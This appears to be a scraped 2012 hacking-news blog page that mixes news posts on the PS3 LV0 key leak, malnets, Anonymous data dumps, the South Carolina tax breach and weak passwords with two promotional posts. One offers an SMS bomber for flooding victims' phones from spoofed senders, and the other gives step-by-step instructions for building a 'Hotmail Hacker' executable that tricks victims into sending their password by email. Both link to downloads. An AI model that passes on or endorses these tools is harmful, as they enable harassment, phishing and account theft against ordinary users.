Sony PlayStation 3 hacked with custom firmware

The PlayStation 3 has been hacked before, originally with the PSJailbreak dongle and fail0verflow, but Sony managed to fight back with Firmware 3.60 which managed to ingeniously re-secure the console. But Hackers have released a custom firmware which allows compromised consoles to log into PSN, alongside LV0 decryption keys which allow the user to bypass future security updates.

The hacker group ‘The Three Musketeers’ claims that they already had the keys for a while but decided not to publish them. The information also came into the hands of another Chinese hacking group called BlueDiskCFW which was about to release the Iv0 keys for a fee. To avoid others earning money with their hack, The Three Musketeers decided to publish the keys themselves. Here a Post by Hackers.
The team of hackers released the following announcement:
As this was a group effort, we wouldn’t normally have lost a word about it ever, but as we’re done with PS3 now anyways, we think it doesn’t matter anymore. Congratulations to the guy that leaked stuff, you, sir, are a 1337 haxx0r, jk, you’re an asshole. 

People should know that crooked personalities are widespread in this so called ‘scene’. Some people try to achieve something for fun together and make the wrong decision to trust others and share their results with them, but ofc there got to be the attention seeking fame wh*** that has to leak stuff to feel a little bit better about him-/herself. Now the catch is that it works like this in every ‘scene’, just that in others it usually doesn’t come to light.The only sad thing is, that the others who worked on this won’t get the attention they deserve because they probably want to remain anonymous (also they don’t care about E-fame <3 data-blogger-escaped-br="br">  

PS: This is neither about drama nor E-fame nor ‘OMG WE HAZ BEEN FIRST’, we just thought you should know that we’re disappointed in certain people. You can be sure that if it wouldn’t have been for this leak, this key would never have seen the light of day, only the fear of our work being used by others to make money out of it has forced us to release this now.

- The Three Musketeers 

Sony uses the Iv0 keys to protect the firmware of the Playstation 3. After update 3.60 the Iv0 keys were used to verify the software. With the release of the Iv0 keys to the web, hackers are able to modify current and future Playstation 3 firmwares. Because the Iv0 key is put into the Cell CPU during manufacturing it’s unlikely that Sony will be able to restore the protection of the Playstation 3 with a new update and with the PS3 firmware decrypted also the new PSN authentication key is easy to grab.

Lets see with Sony's upcoming official 4.30 firmware, it has found a way to block off the exploit. 

Read More

300% Increase in malnets Attack in the past six months

Blue Coat systems has undertaken detailed research into the use of 'malnets' by criminals to help support their various attacks in order to uncover the best ways to take down these systems. Botnet infections are commonly spread though compromised websites seeded with malicious scripts and promoted via black hat SEO tactics such as link farms. These malware networks, or malnets, pose a growing threat.

The company said the number of malnets now stands at more than 1,500, an increase of 300% in the past six months, and it expects they will be, "responsible for two-thirds of all malicious cyberattacks in 2012."

According to Blue Coat, the largest known malnet is Shnakule, which has used up to 5,005 malicious hosts or servers at any given time, depending on the capabilities needed at any given moment by its operators. Blue Coat believes that Shnakule is controlled by a single gang, and it's been used to serve up just about every type of known attack, including "fake AV attack, fake code, fake Firefox updates, C&C servers, gambling, work at home stuff, porn," said Van Der Horst. "They've got their fingers in every evil pie out there."

"Then the user's computer is infected with a Trojan," the report said. "Once the computer is compromised it can be used by the botnet to lure new users into the malnet by using the infected machine to send spam to email contact lists, for example."

"A compromised system can also be used to steal the victim's personal information or money, and, in some cases, can also function as a jumping-off point for attacks on neighboring machines," the report said.

"When security companies aggressively pursued the Zeus botnet, malnet operators simply shifted their resources to the Aleuron botnet, developing and using it in attacks," said Blue Coat's researchers.

Interestingly, the rise of malnets has also had some unexpected effects, the company claims. In August, Blue Coat reported that simple 'long tail' web searches were still far more important for serving malware than special events such as the London Olympics or breaking news. 

Read More

Anonymous Hackers leaks 1.35GB Italian State Police Data

Italian Anonymous hackers has released 1.35 Gigabyte data from the Italian State Police (Polizia di Stato). The Hack was announced on Monday via The Official Blog of Italy Anonymous. Data uploaded on torrent and available for download. The group has started a campaign named #AntiSecITA.

"Anonymous group in Italy appears less active respect other countries, and this has misled those who have been victims of their attacks. Too much Italian security professionals consider the group as a disorganized collective unable to cause serious problems to the political reality of the country." Security Affairs mention.

Hacker upload some sample folder which contains assorted material from the archives, like details about wiretaps from Telecom Italia and confidential technical information about interception devices. Information taken from state police servers and portals include police reports, mobile phone numbers, personal email, information on salaries, and soft-porn pictures, complete archive of more than 3500 private documents.

The complete dump is also available on a FTP. A spokesman for the Interior Ministry told Reuters that the police engineers are "checking" the published literature, and for the moment there are no statements.

Anonymous Italy gives details of the hack and dump:
For weeks, we love to browse in your server, in your email address, your portals, documents, records and much more.

We are in possession of a large amount of material, eg documents on interception systems, spreadsheets, bugs latest generation of covert activities, files related to the notav and dissidents; various circulars but also numerous e-mails, some of which demonstrate your dishonesty (eg a communication in which you explain how the weapon seized appropriarvi to a foreign man without committing the crime of receiving stolen goods).

The security level of your system, contrary to what we thought was really poor, and we take the opportunity to take our revenge. Is there any problem, Officer?

This is not the first time that Italy Anonymous hacker attacks against the police. In July 2011, the activists announced that they have seized Italian anti-crime agency files on different international organizations, for a total of more than 8 gigabytes, stored on the server of the National Center for Computer Crime Protection of Critical Infrastructures (CNAIPIC). 

Read More

Hacker steal 16000 unencrypted credit cards & 3.6 million Social Security numbers

 The South Carolina Department of Revenue has announced that millions of Social Security numbers and debit/credit card numbers have been compromised.

Hackers from outside the United States recently penetrated the website for South Carolina’s Department of Revenue and reportedly made off with 3.6 million Social Security numbers and 16,000 unencrypted credit and debit card numbers.

According to the statement, investigators discovered that a hacker attempted to access the system several times in August and September. The statement said it is believed the hacker successfully obtained data for the first time in mid-September.

“We are taking immediate steps to protect the taxpayers of South Carolina, including providing one year of credit monitoring and identity protection to those affected.”

Haley says Friday was the earliest they could announce the breach to allow law enforcement personnel to do their jobs and keep the chance of catching the hacker.

Haley says the most important thing for South Carolinians to do is be overly cautious. She recommends everyone who has filed a tax return in South Carolina since 1998 to call 1-866-578-5422 then visit www.protectmyid.com/scdor with the activation code they receive from calling the phone number. 

Read More

Bomb mobile phone with sms:Beavers SMS bomber Pro

This program will bomb the victim's mobile phone with tons of SMS. It supports all major networks around the world. But if your network is not in the list, then don't worry, you can also add the carrier network with the help of "custom" option. You can also load list of multiple victims and bomb them simultaneously. The improvement that Beaver has made in this version over his previous SMS Bomber is that you can spoof the email address from which you are bombing the victim's mobile phone. For Example, If there was an error sending the message, it will ask you if you wanna change the E-mail/Password you are using. All credits to Beaver for this nice program.

Download here 

http://www.mediafire.com/download.php?zmd4mtbmtol

Read More

Hack Hotmail Account:Hotmail Hacker

Just follow the steps below:
1. Extract the RAR archive in a separate folder.
2. Run Hotmail Hacker Builder.exe file on your computer.
3. Enter your email address, password and subject of email you wanna receive. I suggest you to create a new email ID for this. You can use Gmail or Yahoo but avoid using Hotmail account. This email will contain the password you wanna hack. Also select appropriate smtp server address. The default smtp server address 587 is of gmail. You can google for smtp server addresses or can find it here. Also, write a fake error message to display on the screen or leave it default.
4. Click on "Build". This will create your own Hotmail hacker in Hotmail hacker folder.
5. Now, send this Hotmail Hacker.exe file to victim of which you wanna hack Hotmail password and convince him that this program can hack anyone's Hotmail password (lil bit of Social Engineering).
6. Ask him to run Hotmail Hacker.exe and enter all information including his Hotmail ID and password and Hotmail ID of victim he wanna hack. As he enters this information and hits "Login and Start", he will receive a error message.
7. You will receive an email in your account containing his password. Hooray!!! you will now be able to hack hotmail password. Enjoy!!!

Download here:

http://www.mediafire.com/download.php?zjogjlw0ndm

Read More

World's SEXIEST Hacker

STUNNING student Kristina Svechinskaya has been dubbed the world's sexiest computer hacker after being linked to a £22million cyber-scam.

The Russian brunette, 22, is accused of using fake passports to open a string of accounts which were flooded with cash plundered from online bank customers.

The blue-eyed beauty wept as she was brought before a New York court over the online racket, believed to have syphoned £6million from UK victims.

Police believe she was recruited as a money launderer by a high-tech gang using a "Zeus Trojan" virus to hack into bank accounts to steal account numbers, user names and password details.

Svechinskaya was among four New York students accused of assisting the racket after investigators held 37 Eastern European suspects said to have been involved.

Bank accounts from the US, UK and across the globe were raided.

Stolen money was transferred into hundreds of fake bank accounts set up in the US by alleged "money mules" like Svechinskaya, said to have taken a ten per cent cut of the profits.

She allegedly opened at least five accounts under her own name and the aliases, Anastasia Opokina and Svetlana Makarova, into which more than £22,000 was fraudulently deposited, and of which £7,000 was withdrawn.

She is the latest Eastern European beauty to be linked with high-level conspiracies following the arrest of flame-haired Anna Chapman, 28, who was unmasked as a Russian agent by the US authorities in July.

Later that month gorgeous Latvian Anne Fermanova, 24, was held after she was caught sneaking high-tech night vision sights - on a banned secret weapons list - into Russia. mpu

Svechinskaya faces up to 40 years behind bars for conspiracy to commit bank fraud and false use of a passport and is due to reappear in court tomorrow.

Manhattan lawyer Preet Bharara said: "The digital age brings with it many benefits, but also many challenges for law enforcement and our financial institutuions.

"As these arrests show, the modern, high-tech bank heist does not require a gun, a mask, a note, or a getaway car.

"It requires only the internet and ingenuity and can be accomplished in the blink of an eye, with just a click of the mouse."

Svechinskaya has been charged with one count of conspiracy to commit bank fraud and one count of false use of passports. 

Read More

Anonymous Hacker claims to have 20,000 debit card details from HSBC Cyberattack

"FawkesSecurity" who claim responsibility for a DDOS cyber attack on HSBC Bank says that they also manage to get 20,000 debit card details.

When HSBC said, "This denial-of-service attack did not affect any customer data, but did prevent customers using HSBC online services, including Internet banking.", Anonymous tweeted on Friday. “We also managed to log 20,000 debit card details.”

On asking, is there any proof of this claim , they replied ,“ We're debating whether to release them or not, HSBC knows debit details were intercepted, They probz won't admit it tho,”.

On the other hand, A group that calls itself Izz ad-Din Al Qassam , which has claimed responsibility for recent cyberattacks on at least nine other banks, also took responsibility for the assault on HSBC.

Who ever the real hitman behind this, but according to hacker's warnings - RBS, Lloyds TSB and Barclays Banks are next targets. In a YouTube video the group said it was holding back on its reason for the attack.
  

Read More

Anonymous going to lauch wikileaks like project called TYLER

 

International hacker group Anonymous is going to create a WikiLeaks competitor scandalous leak portal called Tyler, for the publication of secret information from governments of various countries. One of the group’s members, who specified that he is representing the collective, spoke about the TYLER project and the rift with WikiLeaks in an email interview with the Voice of Russia.

They have scheduled this new project to December 21 this year. According to the hacker, who requested anonymity, the conflict between Anonymous and the website of Julian Assange revolves around the forced funding techniques and lack of transparency around money to WikiLeaks.

So far Anonymous defends WikiLeaks and Assange personally and supported the mission of the site to share information, news and classified information with the public. They even helped to publish more than 2 million emails, known as the Syrian file.

 

Since Assange has repeatedly threatened to close the WikiLeaks, hackers have decided to create their own platform for publishing secret government documents. According to Anonymous, Tyler will be a unique service project, as it will not have fixed the server - it will be based on the principle of decentralized or peer to peer network based on the equality of participants. Hackers claim that the attack or close the platform due to this will be impossible.

When asked about the future of WikiLeaks, the anonymous hacker said “Julian has threatened on at least one previous occasion to pull the plug on the project because the fundraising was not meeting his expectations. It was at that time that Anonymous began planning to field our own alternative disclosure platforms. Julian desperately needs WikiLeaks, and he is the only one that can pull the plug on the project. I rather think that so long as he is in dire straits, he will not do so despite any threats from him to the contrary.”

In this case, it is unclear whether the hacker to interview to Russian media reflect the views of the entire community of anonymous or its individual fragments as haktivistite not acting in an organized group with a recognized leader.

 

Read More

Worst password of 2012, Have you ever used one of these ?

This year we have seen some big Security breaches that expose millions of passwords like Yahoo!, LinkedIn, eHarmony andLast.fm, among others , SplashData Reveals Its Annual "25 Worst Passwords of the Year" List.

The three worst passwords haven't changed since 2011; they're password, 123456 and 12345678. The new worst passwords added to this year's list include welcome, jesus, ninja, mustang and password1. Have you ever used one of the most popular passwords of 2012 for your own personal accounts?

SplashData CEO Morgan Slain stated “At this time of year, people enjoy focusing on scary costumes, movies and decorations, but those who have been through it can tell you how terrifying it is to have your identity stolen because of a hacked password.”

 

“We’re hoping that with more publicity about how risky it is to use weak passwords, more people will start taking simple steps to protect themselves by using stronger passwords and using different passwords for different websites.”

I am sure hope you didn't find one of your passwords. If you did, I highly advise you switch it fast. In order to create a safer password, use security phrases with at least eight characters while utilizing a variety of characters within the phrase. Also use multiple passwords across different types of sites.

Password management applications also can help users keep track of their passwords and avoid using the same password for multiple sites, which is another bad practice, especially when mixing, say, entertainment and social networking sites with financial services. 

Read More